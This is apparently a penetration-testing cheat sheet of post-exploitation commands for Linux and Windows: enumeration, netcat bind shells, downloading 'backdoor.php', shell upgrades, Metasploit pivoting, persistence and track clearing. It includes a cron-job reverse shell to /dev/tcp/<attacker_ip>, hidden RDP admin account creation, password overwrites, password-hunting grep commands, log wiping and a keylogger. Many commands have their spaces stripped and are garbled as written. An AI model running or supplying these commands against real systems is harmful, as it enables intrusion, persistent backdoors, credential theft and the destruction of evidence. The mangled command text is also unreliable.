ctrl+c# Terminate the currently running commandctrl+r# Search the current terminal session’s command historyctrl+a# Go to the start of linectrl+e# Go the the end of linectrl+z# Sleep program# Filesbase64-w0file.txt# Encode file to Base64wc-lfile.txt# Count Lineswc-cfile.txt# Count Charscatfile.txt|sort|uniq# Sort and delete duplicatessed-i's/OLD/NEW/g'file.txt# Replace string inside a filels-al/etc/cron*# Display all file that start with cron*cat/etc/cron*# Display the contents of all cron* files# Decompress7z-xfile.7z# .7zbzip2-dfile.bz2# .bz2gunzipfile.gz# .gztar-xvzffile.tar.gz# .tar.gztar-jxffile.tar.bz2# .tar.bz2tar-xvjffile.tbz# .tbztar-xvzffile.tgz# .tgzunzipfile.zip# .zipunxzfile.xz# .xz (apt install xz-utils)# Clipboardxclip-selc<file.txt# Search strings inside filesgrep-ripassword# Search password (case insensitive) in all subdirectorygrep-Ei'pass|user'file.txt# Search pass or user strings in file.txtgrep-Eri'pass|user'# Search pass or user strings in all subdirectory# with color, ignore binaries (-I), print line number (-n) and redirect errorsgrep--color=auto-rn-iIE"PASSW|PWD"2>/dev/null# Change user: rootsu# Change user: <username>su<username># Change Linux user password (Copy output and past it in /etc/shadow)opensslpasswd-1-salt<salt><new_pass># -1 means weakest algorithm, -6 means strongest
Enumeration
# System infocat/etc/os-release# Print linux distro versioncat/etc/issue# Print linux distro version lsb_release-a# Print linux distro versionuname-a# Print certain system information.env# Print environment variableslscpu# Hardware infofree-h# RAM usagedf-h# Disk usagedpkg-l# List packages installed with version# Enumerate Userswhoamigroups<user>useradd-m<user>-s/bin/bash# Creates a userusermod-aGroot<user># Add bob to root grouplastlog# Ssh session enumeratelast# Log of users logged in# Enumerate Networkipa# Useful also to discover other networkcat/etc/hostname# Display hostnamecat/etc/hosts# Maps IP addresses to domain (Useful to discover internal domain you can access)cat/etc/resolv.conf# Display the domain name server (Many times it is the default gateway)netstat-tulpn# Display the network connectionsarp-a# Display the host ARP cacheroute# View and modify the routing table# Note: gateway is important... it can be a DNS server, DHCP server or all in one# Processes & servicespsaux# Display all process. It use windows size (truncation)psauxw# Use 132 columns to display info, instead of the window size.psauxww# ps will use as many columns as necessary.top# Dynamic real-time view of a running system (like task manager)crontab-l# Display cronjob for the root user
Windows
:: System infosysteminfo:: Get current userwhoami:: Get current user privilegeswhoami /priv:: Get installed updates. Useful to see security patchwmic qfe get Caption,HotFixID,InstalledOn,Description :: Adds, displays, or modifies local groupsnet localgroup:: Get group membership of user -> net localgroup administratorsnet localgroup<group>:: Get user infonet user<user>:: Network Infoipconfig /all:: Lists info on tcp/udp portsnetstat -ano:: Shows f/w statusnetsh advfirewall show allprofiles:: Display arp table (arp cache to discover other IP addresses on the target network)arp -a:: Print route table (useful during the pivoting phase of post-exploitation as it can reveal network routes)routeprint:: Processes & Services:: Lists services runningnet start:: Same as above with extra details like pid, active state, etc.wmic service list brief:: Stop a servicenet stop<servicename>:: List process with respecive servicestasklist /svc :: List scheduled tasksschtasks /query /fo list /v:: Automation : JAWS - https://github.com/411Hall/JAWSpowershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt:: Change Windows user passwordnet user<username><new_pass>
Bind Shell
This type of shell is not preferred as the attacker directly connects to the target system and in most cases, ingress traffic is always blocked or flagged as suspicious.
# Windows (target)nc-nvlp<target_port>-ecmd.exenc.exe-nvlp<target_port>-ecmd.exe# Linux (target)nc-nvlp<target_port>-e/bin/bash# Linux (attacker)nc-nv<target_ip><target_port># Windows (attacker)nc.exe-nv<target_ip><target_port># Linux Metasploit (attacker)usemulti/handlersetpayloadgeneric/shell_bind_tcp# Try also "linux/x64/shell_bind_tcp"setrhost<target_ip>setlport<target_port>run
Transfer files
# Start web serverpython3-mhttp.server8080python2-mSimpleHTTPServer8080php-S127.0.0.1:8080# Download (HTTP Windows)certutil-urlcache-fhttp://<host>/backdoor.phpbackdoor.php# Download (HTTP Linux)wgethttp://<host>/backdoor.php# Netcat [useful when the victim cannot reach you, but you can]nc-nvlp<target_port>>backdoor.php# [recepient]nc-w3<ip><target_port><backdoor.php# [sender]# With base64catfile|base64-w0# get base64 [output is a single continuous line]echo<output_base64>|base64-d>file# create file# Tips# 1 tip - Progress Indicator in netcatpvbackdoor.php|nc-w3<ip><target_port># [sender] (install pv)# 2 tip - Check md5md5sumbackdoor.php# Note: netcat "-n" option means no DNS (only IP)
[Fully] interactive shell
Interactive shell
/bin/bash-i# Linux
Fully interactive shell
# 1 Steppython3-c'import pty;pty.spawn("/bin/bash")'python-c'import pty;pty.spawn("/bin/bash")'# 2 StepCTRL+Z# Press CTRL + Z to background process and get back to your host machine# 3 Stepsttyraw-echo; fg# 4 Stepexport TERM=xterm
Automatic
# https://github.com/brightio/penelope# Currently only Unix shells are fully supported. # There's basic support (netcat-like interaction + logging)./penelope.py<port># Reverse shell./penelope.py-c<target><port># Bind shell
Pivoting & Port forwarding
Metasploit (meterpreter) - Autoroute:Anytime we want to contact a machine within one of the networks specified, we will go through meterpreter session and use that to connect to the targets.
# Find subnet (the 2nd target host may be in other network)ipconfig# IP: 19.9.29.148. Netmask: 255.255.240.0# Add routesrunautoroute-s<subnet># Ex: run autoroute -s 10.10.0.29.0/20# Displays active routing tablerunautoroute-p# Now you can perform a scan. auxiliary/scanner/portscan/tcp
Notes
Scanning with metasploit is limited (we can't discover software version etc...) so it's better to use nmap. To do that we need to perform port forwarding.
Since target_sys_2 does not have a route back to attacker_sys, when you user an exploit, use bind_shell payload. Ex: windows/meterpreter/bind_tcp
Port forwarding (meterpreter/metasploit)
# Forward remote port to local port. Here, we want to scan the port 80 of the target 2portfwdadd-l1234-p80-r<target_sys_2_ip>portfwdlistnmap-sV-sC-p1234localhost
Persistence
Windows
(1) Metasploit - Module: Search persistence module (Windows). Ex: exploit/windows/local/persistence_service (Requires admin or system privileges). When you want to connect again set a listener to receive the connection
(2) Enable RDP
First way with metasploit: search enable_rdp (and set session). Then connect to victim.
Note: you need username and password, if you don't have the password, change it net user <username> <new_pass> (suspicious in a real environment) or crack NTLM or you can create a new account and add it to administrator group.
Second way with metasploit/meterpreter (auto create account and settings):
# In meterpreterrungetgui-e-uuser_you_want-ppassword_you_want# This enables rdp service -> # Creates new user with the provided parameters -> # Hides user from windows login screen -> # Adds user to Remote Desktop Users and Administrators group
Linux
(1) Metasploit: Search persistence module (Linux). Example: post/linux/manage/sshkey_persistence (needed elevated privs - This module will add an SSH key to a specified user)
(2) Via SSH key: After gaining access to linux system, you can transfer SSH private key to local machine and use it to connect via SSH
(3) With cron jobs
# 1. Set up listener# 2. Create a cronjob (every minute time format)echo"* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'">cron# 3. This will replace the user's existing crontab with the contents of 'cron'crontabcron# Crontab for the current usercrontab-l#NOTE: if the command doesn't work try with another revshell
Clearing tracks
Windows
# Metasploit/Meterpreterclearev# Clear the Application, System, and Security logs on a Windows system
Linux
history-c# Clear historycat/dev/null>~/.bash_history# Same as above
Keylogger
# With metasploitkeyscan_start# Start keyloggerkeyscan_dumpprint# Captured strokes